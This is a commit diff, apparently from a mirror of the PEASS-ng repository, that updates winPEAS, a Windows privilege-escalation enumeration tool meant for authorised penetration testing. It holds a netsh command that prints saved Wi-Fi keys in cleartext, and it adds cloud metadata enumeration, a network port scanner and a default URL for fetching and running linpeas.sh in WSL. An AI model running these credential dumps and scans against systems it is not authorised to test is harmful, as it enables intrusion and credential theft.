github/PEASS-ng
1
Fork 0
mirror of https://github.com/carlospolop/PEASS-ng synced 2024-11-20 12:39:21 +01:00
Code Releases Activity

WinPEASS Big Update

Browse Source
This commit is contained in:
Carlos Polop 2024-08-27 22:08:48 +02:00
parent c37db4654c
commit b435119723
36 changed files with 1727 additions and 729 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
LICENSE
View File

@ -1,7 +1,7 @@
COPYING -- Describes the terms under which peass-ng is distributed. A copy COPYING -- Describes the terms under which peass-ng is distributed. A copy
of the GNU General Public License (GPL) is appended to this file. of the GNU General Public License (GPL) is appended to this file.
peass-ng is (C) 2006-2022 Carlos Polop Martin. peass-ng is (C) 2019-2024 Carlos Polop Martin.
This program is free software; you may redistribute and/or modify it under This program is free software; you may redistribute and/or modify it under
the terms of the GNU General Public License as published by the Free the terms of the GNU General Public License as published by the Free

3
README.md
View File

@ -38,6 +38,3 @@ If you want to **add something** and have **any cool idea** related to this proj
All the scripts/binaries of the PEAS suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own machines and/or with the owner's permission. All the scripts/binaries of the PEAS suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own machines and/or with the owner's permission.
By Polop<sup>(TM)</sup>

2
linPEAS/README.md
View File

@ -233,5 +233,3 @@ If you find any issue, please report it using **[github issues](https://github.c
All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission. All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
By Polop<sup>(TM)</sup>

2
winPEAS/README.md
View File

@ -23,5 +23,3 @@ Are you a PEASS fan? Get now our merch at **[PEASS Shop](https://teespring.com/s
## Advisory ## Advisory
All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission. All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
By Polop

3
winPEAS/winPEASbat/README.md
View File

@ -132,6 +132,3 @@ This is the kind of outpuf that you have to look for when usnig the winPEAS.bat
## Advisory ## Advisory
All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission. All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
By Polop<sup>(TM)</sup>

6
winPEAS/winPEASbat/winPEAS.bat
View File

@ -4,7 +4,7 @@ COLOR 0F
CALL :SetOnce CALL :SetOnce
REM :: WinPEAS - Windows local Privilege Escalation Awesome Script REM :: WinPEAS - Windows local Privilege Escalation Awesome Script
REM :: Code by PEASS-ng; Re-Write by ThisLimn0 REM :: Code by carlospolop; Re-Write by ThisLimn0
REM Registry scan of other drives besides REM Registry scan of other drives besides
REM /////true or false REM /////true or false
@ -46,7 +46,7 @@ CALL :ColorLine " %E%32m(((((((((. ,%E%92m(############################(%E%32m
CALL :ColorLine " %E%32m(((((((((/, %E%92m,####################(%E%32m/..((((((((((.%E%97m" CALL :ColorLine " %E%32m(((((((((/, %E%92m,####################(%E%32m/..((((((((((.%E%97m"
CALL :ColorLine " %E%32m(((((((((/,. %E%92m,*//////*,.%E%32m ./(((((((((((.%E%97m" CALL :ColorLine " %E%32m(((((((((/,. %E%92m,*//////*,.%E%32m ./(((((((((((.%E%97m"
CALL :ColorLine " %E%32m(((((((((((((((((((((((((((/%E%97m" CALL :ColorLine " %E%32m(((((((((((((((((((((((((((/%E%97m"
ECHO. by github.com/PEASS-ng ECHO. by carlospolop
ECHO. ECHO.
ECHO. ECHO.
@ -363,7 +363,7 @@ CALL :T_Progress 1
:WifiCreds :WifiCreds
CALL :ColorLine " %E%33m[+]%E%97m WIFI" CALL :ColorLine " %E%33m[+]%E%97m WIFI"
for /f "tokens=3,* delims=: " %%a in ('netsh wlan show profiles ^| find "Profile "') do (netsh wlan show profiles name=%%b key=clear | findstr "SSID Cipher Content" | find /v "Number" & ECHO.) for /f "tokens=4 delims=: " %%a in ('netsh wlan show profiles ^| find "Profile "') do (netsh wlan show profiles name=%%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & ECHO.)
CALL :T_Progress 1 CALL :T_Progress 1
:BasicUserInfo :BasicUserInfo

8
winPEAS/winPEASexe/README.md
View File

@ -178,6 +178,11 @@ Once you have installed and activated it you need to:
- [x] DNS Cache (limit 70) - [x] DNS Cache (limit 70)
- [x] Internet Settings - [x] Internet Settings
- **Cloud Metadata Enumeration**
- [x] AWS Metadata
- [x] GCP Metadata
- [x] Azure Metadata
- **Windows Credentials** - **Windows Credentials**
- [x] Windows Vault - [x] Windows Vault
- [x] Credential Manager - [x] Credential Manager
@ -256,6 +261,3 @@ If you find any issue, please report it using **[github issues](https://github.c
## Advisory ## Advisory
All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission. All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
By Polop

2
winPEAS/winPEASexe/Tests/SmokeTests.cs
View File

@ -12,7 +12,7 @@ namespace winPEAS.Tests
try try
{ {
string[] args = new string[] { string[] args = new string[] {
"systeminfo", "userinfo", "servicesinfo", "browserinfo", "eventsinfo", "debug" "systeminfo", "userinfo", "servicesinfo", "browserinfo", "eventsinfo", "cloud", "debug"
}; };
Program.Main(args); Program.Main(args);
} }

4
winPEAS/winPEASexe/winPEAS/3rdParty/Watson/Watson.cs vendored
View File

@ -20,7 +20,7 @@ namespace winPEAS._3rdParty.Watson
{ {
{ 10240, "1507" }, { 10586, "1511" }, { 14393, "1607" }, { 15063, "1703" }, { 16299, "1709" }, { 10240, "1507" }, { 10586, "1511" }, { 14393, "1607" }, { 15063, "1703" }, { 16299, "1709" },
{ 17134, "1803" }, { 17763, "1809" }, { 18362, "1903" }, { 18363, "1909" }, { 19041, "2004" }, { 17134, "1803" }, { 17763, "1809" }, { 18362, "1903" }, { 18363, "1909" }, { 19041, "2004" },
{ 19042, "20H2" } { 19042, "20H2" }, { 22000, "21H2" }, { 22621, "22H2" }
}; };
// Get OS Build number // Get OS Build number
@ -30,7 +30,6 @@ namespace winPEAS._3rdParty.Watson
if (!supportedVersions.ContainsKey(buildNumber)) if (!supportedVersions.ContainsKey(buildNumber))
{ {
Console.Error.WriteLine($" [!] Windows version not supported, build number: '{buildNumber}'"); Console.Error.WriteLine($" [!] Windows version not supported, build number: '{buildNumber}'");
return;
} }
var version = supportedVersions[buildNumber]; var version = supportedVersions[buildNumber];
@ -39,7 +38,6 @@ namespace winPEAS._3rdParty.Watson
else else
{ {
Console.Error.WriteLine(" [!] Could not retrieve Windows BuildNumber"); Console.Error.WriteLine(" [!] Could not retrieve Windows BuildNumber");
return;
} }
// List of KBs installed // List of KBs installed

10
winPEAS/winPEASexe/winPEAS/Checks/ApplicationsInfo.cs
View File

@ -117,6 +117,7 @@ namespace winPEAS.Checks
{ (app["Folder"].Length > 0) ? app["Folder"].Replace("\\", "\\\\").Replace("(", "\\(").Replace(")", "\\)").Replace("]", "\\]").Replace("[", "\\[").Replace("?", "\\?").Replace("+","\\+") : "ouigyevb2uivydi2u3id2ddf3", !string.IsNullOrEmpty(app["interestingFolderRights"]) ? Beaprint.ansi_color_bad : Beaprint.ansi_color_good }, { (app["Folder"].Length > 0) ? app["Folder"].Replace("\\", "\\\\").Replace("(", "\\(").Replace(")", "\\)").Replace("]", "\\]").Replace("[", "\\[").Replace("?", "\\?").Replace("+","\\+") : "ouigyevb2uivydi2u3id2ddf3", !string.IsNullOrEmpty(app["interestingFolderRights"]) ? Beaprint.ansi_color_bad : Beaprint.ansi_color_good },
{ (app["File"].Length > 0) ? app["File"].Replace("\\", "\\\\").Replace("(", "\\(").Replace(")", "\\)").Replace("]", "\\]").Replace("[", "\\[").Replace("?", "\\?").Replace("+","\\+") : "adu8v298hfubibuidiy2422r", !string.IsNullOrEmpty(app["interestingFileRights"]) ? Beaprint.ansi_color_bad : Beaprint.ansi_color_good }, { (app["File"].Length > 0) ? app["File"].Replace("\\", "\\\\").Replace("(", "\\(").Replace(")", "\\)").Replace("]", "\\]").Replace("[", "\\[").Replace("?", "\\?").Replace("+","\\+") : "adu8v298hfubibuidiy2422r", !string.IsNullOrEmpty(app["interestingFileRights"]) ? Beaprint.ansi_color_bad : Beaprint.ansi_color_good },
{ (app["Reg"].Length > 0) ? app["Reg"].Replace("\\", "\\\\").Replace("(", "\\(").Replace(")", "\\)").Replace("]", "\\]").Replace("[", "\\[").Replace("?", "\\?").Replace("+","\\+") : "o8a7eduia37ibduaunbf7a4g7ukdhk4ua", (app["RegPermissions"].Length > 0) ? Beaprint.ansi_color_bad : Beaprint.ansi_color_good }, { (app["Reg"].Length > 0) ? app["Reg"].Replace("\\", "\\\\").Replace("(", "\\(").Replace(")", "\\)").Replace("]", "\\]").Replace("[", "\\[").Replace("?", "\\?").Replace("+","\\+") : "o8a7eduia37ibduaunbf7a4g7ukdhk4ua", (app["RegPermissions"].Length > 0) ? Beaprint.ansi_color_bad : Beaprint.ansi_color_good },
{ "Potentially sensitive file content:", Beaprint.ansi_color_bad },
}; };
string line = ""; string line = "";
@ -158,9 +159,9 @@ namespace winPEAS.Checks
line += "\n File: " + filepath_mod; line += "\n File: " + filepath_mod;
} }
if (app["isUnquotedSpaced"].ToLower() == "true") if (app["isUnquotedSpaced"].ToLower() != "false")
{ {
line += " (Unquoted and Space detected)"; line += $" (Unquoted and Space detected) - {app["isUnquotedSpaced"]}";
} }
if (!string.IsNullOrEmpty(app["interestingFileRights"])) if (!string.IsNullOrEmpty(app["interestingFileRights"]))
@ -168,6 +169,11 @@ namespace winPEAS.Checks
line += "\n FilePerms: " + app["interestingFileRights"]; line += "\n FilePerms: " + app["interestingFileRights"];
} }
if (app.ContainsKey("sensitiveInfoList") && !string.IsNullOrEmpty(app["sensitiveInfoList"]))
{
line += "\n Potentially sensitive file content: " + app["sensitiveInfoList"];
}
Beaprint.AnsiPrint(line, colorsA); Beaprint.AnsiPrint(line, colorsA);
Beaprint.PrintLineSeparator(); Beaprint.PrintLineSeparator();
} }

118
winPEAS/winPEASexe/winPEAS/Checks/Checks.cs
View File

@ -3,12 +3,14 @@ using System.Collections.Generic;
using System.IO; using System.IO;
using System.Linq; using System.Linq;
using System.Management; using System.Management;
using System.Net;
using System.Security.Principal; using System.Security.Principal;
using winPEAS.Helpers; using winPEAS.Helpers;
using winPEAS.Helpers.AppLocker; using winPEAS.Helpers.AppLocker;
using winPEAS.Helpers.Registry; using winPEAS.Helpers.Registry;
using winPEAS.Helpers.Search; using winPEAS.Helpers.Search;
using winPEAS.Helpers.YamlConfig; using winPEAS.Helpers.YamlConfig;
using winPEAS.Info.NetworkInfo.NetworkScanner;
using winPEAS.Info.UserInfo; using winPEAS.Info.UserInfo;
namespace winPEAS.Checks namespace winPEAS.Checks
@ -21,8 +23,12 @@ namespace winPEAS.Checks
public static bool IsDebug = false; public static bool IsDebug = false;
public static bool IsLinpeas = false; public static bool IsLinpeas = false;
public static bool IsLolbas = false; public static bool IsLolbas = false;
public static bool IsNetworkScan = false;
public static bool SearchProgramFiles = false; public static bool SearchProgramFiles = false;
private static IEnumerable<int> PortScannerPorts = null;
private static string NetworkScanOptions = string.Empty;
// Create Dynamic blacklists // Create Dynamic blacklists
public static readonly string CurrentUserName = Environment.UserName; public static readonly string CurrentUserName = Environment.UserName;
public static string CurrentUserDomainName = Environment.UserDomainName; public static string CurrentUserDomainName = Environment.UserDomainName;
@ -47,7 +53,7 @@ namespace winPEAS.Checks
private static readonly HashSet<string> _systemCheckSelectedKeysHashSet = new HashSet<string>(); private static readonly HashSet<string> _systemCheckSelectedKeysHashSet = new HashSet<string>();
// github url for Linpeas.sh // github url for Linpeas.sh
public static string LinpeasUrl = "https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh"; public static string LinpeasUrl = "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh";
public const string DefaultLogFile = "out.txt"; public const string DefaultLogFile = "out.txt";
@ -87,7 +93,8 @@ namespace winPEAS.Checks
new SystemCheck("windowscreds", new WindowsCreds()), new SystemCheck("windowscreds", new WindowsCreds()),
new SystemCheck("browserinfo", new BrowserInfo()), new SystemCheck("browserinfo", new BrowserInfo()),
new SystemCheck("filesinfo", new FilesInfo()), new SystemCheck("filesinfo", new FilesInfo()),
new SystemCheck("fileanalysis", new FileAnalysis()) new SystemCheck("fileanalysis", new FileAnalysis()),
new SystemCheck("cloudinfo", new CloudInfo())
}; };
var systemCheckAllKeys = new HashSet<string>(_systemChecks.Select(i => i.Key)); var systemCheckAllKeys = new HashSet<string>(_systemChecks.Select(i => i.Key));
@ -199,6 +206,52 @@ namespace winPEAS.Checks
} }
} }
if (arg.StartsWith("-network", StringComparison.CurrentCultureIgnoreCase))
{
/*
-network="auto" - find interfaces/hosts automatically
-network="10.10.10.10,10.10.10.20" - scan only selected ip address(es)
-network="10.10.10.10/24" - scan host based on ip address/netmask
*/
if (!IsNetworkTypeValid(arg))
{
Beaprint.ColorPrint($" [!] the \"-network\" argument is invalid. For help, run winpeass.exe --help", Beaprint.YELLOW);
return;
}
var parts = arg.Split('=');
string networkType = parts[1];
IsNetworkScan = true;
NetworkScanOptions = networkType;
}
if (arg.StartsWith("-ports", StringComparison.CurrentCultureIgnoreCase))
{
// e.g. -ports="80,443,8080"
var parts = arg.Split('=');
if (!IsNetworkScan || parts.Length != 2 || string.IsNullOrEmpty(parts[1]))
{
Beaprint.ColorPrint($" [!] the \"-network\" argument is not present or valid, add it if you want to define network scan ports. For help, run winpeass.exe --help", Beaprint.YELLOW);
return;
}
var portString = parts[1];
IEnumerable<int> ports = new List<int>();
try
{
PortScannerPorts = portString.Trim('"').Trim('\'').Split(',').ToList().ConvertAll<int>(int.Parse);
}
catch (Exception)
{
Beaprint.ColorPrint($" [!] the \"-ports\" argument is not present or valid, add it if you want to define network scan ports. For help, run winpeass.exe --help", Beaprint.YELLOW);
return;
}
}
string argToLower = arg.ToLower(); string argToLower = arg.ToLower();
if (systemCheckAllKeys.Contains(argToLower)) if (systemCheckAllKeys.Contains(argToLower))
{ {
@ -237,7 +290,7 @@ namespace winPEAS.Checks
CheckRunner.Run(() => CreateDynamicLists(isFileSearchEnabled), IsDebug); CheckRunner.Run(() => CreateDynamicLists(isFileSearchEnabled), IsDebug);
RunChecks(isAllChecks, wait); RunChecks(isAllChecks, wait, IsNetworkScan);
SearchHelper.CleanLists(); SearchHelper.CleanLists();
@ -258,7 +311,58 @@ namespace winPEAS.Checks
} }
} }
private static void RunChecks(bool isAllChecks, bool wait) private static bool IsNetworkTypeValid(string arg)
{
var parts = arg.Split('=');
string networkType = string.Empty;
if (parts.Length == 2 && !string.IsNullOrEmpty(parts[1]))
{
networkType = parts[1];
// auto
if (string.Equals(networkType, "auto", StringComparison.InvariantCultureIgnoreCase))
{
return true;
}
// netmask e.g. 10.10.10.10/24
else if (networkType.Contains("/"))
{
var rangeParts = networkType.Split('/');
if (rangeParts.Length == 2 && int.TryParse(rangeParts[1], out int res) && res <= 32 && res >= 0)
{
return true;
}
}
// list of ip addresses
else if (networkType.Contains(","))
{
var ips = networkType.Split(',');
try
{
var validIpsCount = ips.ToList().ConvertAll<IPAddress>(IPAddress.Parse).Count();
}
catch (Exception)
{
return false;
}
return true;
}
// single ip
else if (IPAddress.TryParse(networkType, out _))
{
return true;
}
}
return false;
}
private static void RunChecks(bool isAllChecks, bool wait, bool isNetworkScan)
{ {
for (int i = 0; i < _systemChecks.Count; i++) for (int i = 0; i < _systemChecks.Count; i++)
{ {
@ -274,6 +378,12 @@ namespace winPEAS.Checks
} }
} }
} }
if (isNetworkScan)
{
NetworkScanner scanner = new NetworkScanner(NetworkScanOptions, PortScannerPorts);
scanner.Scan();
}
} }
private static void CreateDynamicLists(bool isFileSearchEnabled) private static void CreateDynamicLists(bool isFileSearchEnabled)

93
winPEAS/winPEASexe/winPEAS/Checks/CloudInfo.cs Normal file
View File

@ -0,0 +1,93 @@
using System.Collections.Generic;
using winPEAS.Helpers;
using winPEAS.Info.CloudInfo;
namespace winPEAS.Checks
{
internal class CloudInfo : ISystemCheck
{
public void PrintInfo(bool isDebug)
{
Beaprint.GreatPrint("Cloud Information");
var cloudInfoList = new List<CloudInfoBase>
{
new AWSInfo(),
new AzureInfo(),
new GCPInfo()
};
foreach (var cloudInfo in cloudInfoList)
{
string isCloud = cloudInfo.IsCloud ? "Yes" : "No";
string line = string.Format($"{cloudInfo.Name + "?",-40}{isCloud,-5}");
Dictionary<string, string> colorsMS = new Dictionary<string, string>()
{
{ "Yes", Beaprint.ansi_color_bad },
};
Beaprint.AnsiPrint(line, colorsMS);
}
foreach (var cloudInfo in cloudInfoList)
{
if (cloudInfo.IsCloud)
{
Beaprint.MainPrint(cloudInfo.Name + " Enumeration");
if (cloudInfo.IsAvailable)
{
foreach (var kvp in cloudInfo.EndpointDataList())
{
// key = "section", e.g. User, Network, ...
string section = kvp.Key;
var endpointDataList = kvp.Value;
Beaprint.ColorPrint(section, Beaprint.ansi_color_good);
foreach (var endpointData in endpointDataList)
{
var colors = new Dictionary<string, string>
{
{ endpointData.EndpointName, Beaprint.GRAY }
};
string message;
if (!string.IsNullOrEmpty(endpointData.Data))
{
message = endpointData.Data;
// if it is a JSON data, add additional newline so it's displayed on a separate line
if (message.StartsWith("{"))
{
message = $"\n{message}\n";
}
if (endpointData.IsAttackVector)
{
colors.Add(message, Beaprint.ansi_color_bad);
}
else
{
colors.Add(message, Beaprint.ansi_color_gray);
}
}
else
{
message = "No data received from the metadata endpoint";
}
Beaprint.ColorPrint($"{endpointData.EndpointName,-30}{message}", Beaprint.ansi_color_gray);
}
Beaprint.GrayPrint("");
}
}
else
{
Beaprint.NoColorPrint("Could not connect to the metadata endpoint");
}
}
}
}
}
}

53
winPEAS/winPEASexe/winPEAS/Checks/FileAnalysis.cs
View File

@ -1,4 +1,4 @@
using System; using System;
using System.Collections.Generic; using System.Collections.Generic;
using System.Diagnostics; using System.Diagnostics;
using System.IO; using System.IO;
@ -97,9 +97,19 @@ namespace winPEAS.Checks
else else
{ {
foreach (var fold in file.FullPath.Split('\\').Skip(1)) foreach (var fold in file.FullPath.Split('\\').Skip(1))
{ {
isFileFound = Regex.IsMatch(fold, pattern, RegexOptions.IgnoreCase); try
if (isFileFound) break; {
isFileFound = Regex.IsMatch(fold, pattern, RegexOptions.IgnoreCase, TimeSpan.FromSeconds(20));
if (isFileFound) break;
}
catch (RegexMatchTimeoutException e)
{
if (Checks.IsDebug)
{
Beaprint.GrayPrint($"The file in folder regex {pattern} had a timeout in {fold} (ReDoS avoided but regex unchecked in a file)");
}
}
} }
} }
} }
@ -111,7 +121,17 @@ namespace winPEAS.Checks
} }
else else
{ {
isFileFound = Regex.IsMatch(file.Filename, pattern, RegexOptions.IgnoreCase); try
{
isFileFound = Regex.IsMatch(file.Filename, pattern, RegexOptions.IgnoreCase, TimeSpan.FromSeconds(20));
}
catch (RegexMatchTimeoutException e)
{
if (Checks.IsDebug)
{
Beaprint.GrayPrint($"The file regex {pattern} had a timeout in {file.Filename} (ReDoS avoided but regex unchecked in a file)");
}
}
} }
} }
@ -148,7 +168,7 @@ namespace winPEAS.Checks
return new bool[] { false, somethingFound }; return new bool[] { false, somethingFound };
} }
private static List<string> SearchContent(string text, string regex_str, bool caseinsensitive) public static List<string> SearchContent(string text, string regex_str, bool caseinsensitive)
{ {
List<string> foundMatches = new List<string>(); List<string> foundMatches = new List<string>();
@ -157,17 +177,20 @@ namespace winPEAS.Checks
Regex rgx; Regex rgx;
bool is_re_match = false; bool is_re_match = false;
try try
{ {
// Escape backslashes in the regex string
string escapedRegex = regex_str.Trim().Replace(@"\", @"\\");
// Use "IsMatch" because it supports timeout, if exception is thrown exit the func to avoid ReDoS in "rgx.Matches" // Use "IsMatch" because it supports timeout, if exception is thrown exit the func to avoid ReDoS in "rgx.Matches"
if (caseinsensitive) if (caseinsensitive)
{ {
is_re_match = Regex.IsMatch(text, regex_str.Trim(), RegexOptions.IgnoreCase, TimeSpan.FromSeconds(120)); is_re_match = Regex.IsMatch(text, escapedRegex, RegexOptions.IgnoreCase, TimeSpan.FromSeconds(120));
rgx = new Regex(regex_str.Trim(), RegexOptions.IgnoreCase); rgx = new Regex(escapedRegex, RegexOptions.IgnoreCase);
} }
else else
{ {
is_re_match = Regex.IsMatch(text, regex_str.Trim(), RegexOptions.None, TimeSpan.FromSeconds(120)); is_re_match = Regex.IsMatch(text, escapedRegex, RegexOptions.None, TimeSpan.FromSeconds(120));
rgx = new Regex(regex_str.Trim()); rgx = new Regex(escapedRegex);
} }
} }
catch (RegexMatchTimeoutException e) catch (RegexMatchTimeoutException e)
@ -200,8 +223,6 @@ namespace winPEAS.Checks
Beaprint.GrayPrint($"Error looking for regex {regex_str} inside files: {e}"); Beaprint.GrayPrint($"Error looking for regex {regex_str} inside files: {e}");
} }
//}
return foundMatches; return foundMatches;
} }
@ -444,7 +465,7 @@ namespace winPEAS.Checks
foundRegexes[regex_obj.name][regex.name] = fileResults; foundRegexes[regex_obj.name][regex.name] = fileResults;
} }
} }
catch (Exception ex) catch (System.IO.IOException)
{ {
// Cannot read the file // Cannot read the file
} }
@ -454,8 +475,8 @@ namespace winPEAS.Checks
timer.Stop(); timer.Stop();
TimeSpan timeTaken = timer.Elapsed; TimeSpan timeTaken = timer.Elapsed;
if (timeTaken.TotalMilliseconds > 20000) if (timeTaken.TotalMilliseconds > 10000)
Beaprint.PrintDebugLine($"\nThe regex {regex.regex} took {timeTaken.TotalMilliseconds}s in {f.FullPath}"); Beaprint.PrintDebugLine($"\nThe regex {regex.regex} took {timeTaken.TotalMilliseconds}ms in {f.FullPath}");
} }
} }
} }

18
winPEAS/winPEASexe/winPEAS/Checks/FilesInfo.cs
View File

@ -290,15 +290,13 @@ namespace winPEAS.Checks
const string distribution = "Distribution"; const string distribution = "Distribution";
const string rootDirectory = "Root directory"; const string rootDirectory = "Root directory";
const string runWith = "Run command"; const string runWith = "Run command";
const string wslUser = "WSL user";
const string root = "root";
var colors = new Dictionary<string, string>(); var colors = new Dictionary<string, string>();
new List<string> new List<string> { linpeas, distribution, rootDirectory, runWith, wslUser, root }
{ .ForEach(str => colors.Add(str, Beaprint.ansi_color_bad));
linpeas,
distribution,
rootDirectory,
runWith
}.ForEach(str => colors.Add(str, Beaprint.ansi_color_bad));
Beaprint.BadPrint(" Found installed WSL distribution(s) - listed below"); Beaprint.BadPrint(" Found installed WSL distribution(s) - listed below");
Beaprint.AnsiPrint($" Run {linpeas} in your WSL distribution(s) home folder(s).\n", colors); Beaprint.AnsiPrint($" Run {linpeas} in your WSL distribution(s) home folder(s).\n", colors);
@ -310,14 +308,16 @@ namespace winPEAS.Checks
string distributionSubKey = $"{basePath}\\{wslKey}"; string distributionSubKey = $"{basePath}\\{wslKey}";
string distributionRootDirectory = $"{RegistryHelper.GetRegValue(hive, distributionSubKey, "BasePath")}\\rootfs"; string distributionRootDirectory = $"{RegistryHelper.GetRegValue(hive, distributionSubKey, "BasePath")}\\rootfs";
string distributionName = RegistryHelper.GetRegValue(hive, distributionSubKey, "DistributionName"); string distributionName = RegistryHelper.GetRegValue(hive, distributionSubKey, "DistributionName");
string user = WSLHelper.TryGetRootUser(distributionName, wslKey);
Beaprint.AnsiPrint($" {distribution}: \"{distributionName}\"\n" + Beaprint.AnsiPrint($" {distribution}: \"{distributionName}\"\n" +
$" {wslUser}: \"{user}\"\n" +
$" {rootDirectory}: \"{distributionRootDirectory}\"\n" + $" {rootDirectory}: \"{distributionRootDirectory}\"\n" +
$" {runWith}: wsl.exe --distribution \"{distributionName}\"", $" {runWith}: wsl.exe --distribution \"{distributionName}\"",
colors); colors);
Beaprint.PrintLineSeparator(); Beaprint.PrintLineSeparator();
} }
catch (Exception) { } catch (Exception ex) { }
} }
// try to run linpeas.sh in the default distribution // try to run linpeas.sh in the default distribution
@ -328,7 +328,7 @@ namespace winPEAS.Checks
{ {
try try
{ {
WSL.RunLinpeas(Checks.LinpeasUrl); WSLHelper.RunLinpeas(Checks.LinpeasUrl);
} }
catch (Exception ex) catch (Exception ex)
{ {

9
winPEAS/winPEASexe/winPEAS/Checks/ProcessInfo.cs
View File

@ -36,11 +36,14 @@ namespace winPEAS.Checks
{ "Possible DLL Hijacking.*", Beaprint.ansi_color_bad }, { "Possible DLL Hijacking.*", Beaprint.ansi_color_bad },
}; };
if (DefensiveProcesses.Definitions.ContainsKey(procInfo["Name"])) // we need to find first occurrence of the procinfo name
string processNameSanitized = procInfo["Name"].Trim().ToLower();
if (DefensiveProcesses.AVVendorsByProcess.ContainsKey(processNameSanitized))
{ {
if (!string.IsNullOrEmpty(DefensiveProcesses.Definitions[procInfo["Name"]])) if (DefensiveProcesses.AVVendorsByProcess[processNameSanitized].Count > 0)
{ {
procInfo["Product"] = DefensiveProcesses.Definitions[procInfo["Name"]]; procInfo["Product"] = string.Join(", ", DefensiveProcesses.AVVendorsByProcess[processNameSanitized]);
} }
colorsP[procInfo["Product"]] = Beaprint.ansi_color_good; colorsP[procInfo["Product"]] = Beaprint.ansi_color_good;
} }

3
winPEAS/winPEASexe/winPEAS/Checks/SystemInfo.cs
View File

@ -387,8 +387,7 @@ namespace winPEAS.Checks
static void PrintCachedCreds() static void PrintCachedCreds()
{ {
try try{
{
Beaprint.MainPrint("Cached Creds"); Beaprint.MainPrint("Cached Creds");
Beaprint.LinkPrint("https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-protections#cached-credentials", "If > 0, credentials will be cached in the registry and accessible by SYSTEM user"); Beaprint.LinkPrint("https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-protections#cached-credentials", "If > 0, credentials will be cached in the registry and accessible by SYSTEM user");
string cachedlogonscount = RegistryHelper.GetRegValue("HKLM", @"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "CACHEDLOGONSCOUNT"); string cachedlogonscount = RegistryHelper.GetRegValue("HKLM", @"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "CACHEDLOGONSCOUNT");

10
winPEAS/winPEASexe/winPEAS/Helpers/Beaprint.cs
View File

@ -81,6 +81,7 @@ namespace winPEAS.Helpers
/---------------------------------------------------------------------------------\ /---------------------------------------------------------------------------------\
| {1}Do you like PEASS?{0} | | {1}Do you like PEASS?{0} |
|---------------------------------------------------------------------------------| |---------------------------------------------------------------------------------|
| {3}Get the latest version{0} : {2}https://github.com/sponsors/carlospolop{0} |
| {3}Follow on Twitter{0} : {2}@hacktricks_live{0} | | {3}Follow on Twitter{0} : {2}@hacktricks_live{0} |
| {3}Respect on HTB{0} : {2}SirBroccoli {0} | | {3}Respect on HTB{0} : {2}SirBroccoli {0} |
|---------------------------------------------------------------------------------| |---------------------------------------------------------------------------------|
@ -132,6 +133,7 @@ namespace winPEAS.Helpers
Console.WriteLine(LCYAN + " filesinfo" + GRAY + " Search generic files that can contains credentials" + NOCOLOR); Console.WriteLine(LCYAN + " filesinfo" + GRAY + " Search generic files that can contains credentials" + NOCOLOR);
Console.WriteLine(LCYAN + " fileanalysis" + GRAY + " Search specific files that can contains credentials and for regexes inside files" + NOCOLOR); Console.WriteLine(LCYAN + " fileanalysis" + GRAY + " Search specific files that can contains credentials and for regexes inside files" + NOCOLOR);
Console.WriteLine(LCYAN + " eventsinfo" + GRAY + " Display interesting events information" + NOCOLOR); Console.WriteLine(LCYAN + " eventsinfo" + GRAY + " Display interesting events information" + NOCOLOR);
Console.WriteLine(LCYAN + " cloudinfo" + GRAY + " Enumerate cloud information" + NOCOLOR);
Console.WriteLine(); Console.WriteLine();
Console.WriteLine(LCYAN + " quiet" + GRAY + " Do not print banner" + NOCOLOR); Console.WriteLine(LCYAN + " quiet" + GRAY + " Do not print banner" + NOCOLOR);
Console.WriteLine(LCYAN + " notcolor" + GRAY + " Don't use ansi colors (all white)" + NOCOLOR); Console.WriteLine(LCYAN + " notcolor" + GRAY + " Don't use ansi colors (all white)" + NOCOLOR);
@ -146,6 +148,11 @@ namespace winPEAS.Helpers
Console.WriteLine(LCYAN + " -lolbas" + GRAY + $" Run additional LOLBAS check" + NOCOLOR); Console.WriteLine(LCYAN + " -lolbas" + GRAY + $" Run additional LOLBAS check" + NOCOLOR);
Console.WriteLine(LCYAN + " -linpeas=[url]" + GRAY + $" Run additional linpeas.sh check for default WSL distribution, optionally provide custom linpeas.sh URL\n" + Console.WriteLine(LCYAN + " -linpeas=[url]" + GRAY + $" Run additional linpeas.sh check for default WSL distribution, optionally provide custom linpeas.sh URL\n" +
$" (default: {Checks.Checks.LinpeasUrl})" + NOCOLOR); $" (default: {Checks.Checks.LinpeasUrl})" + NOCOLOR);
Console.WriteLine(LCYAN + " -network" + GRAY + $" Run additional network scanning - find network interfaces, hosts and scan nmap top 1000 TCP ports for each host found\n" +
$" -network=\"auto\" - find interfaces/hosts automatically" + NOCOLOR + "\n" +
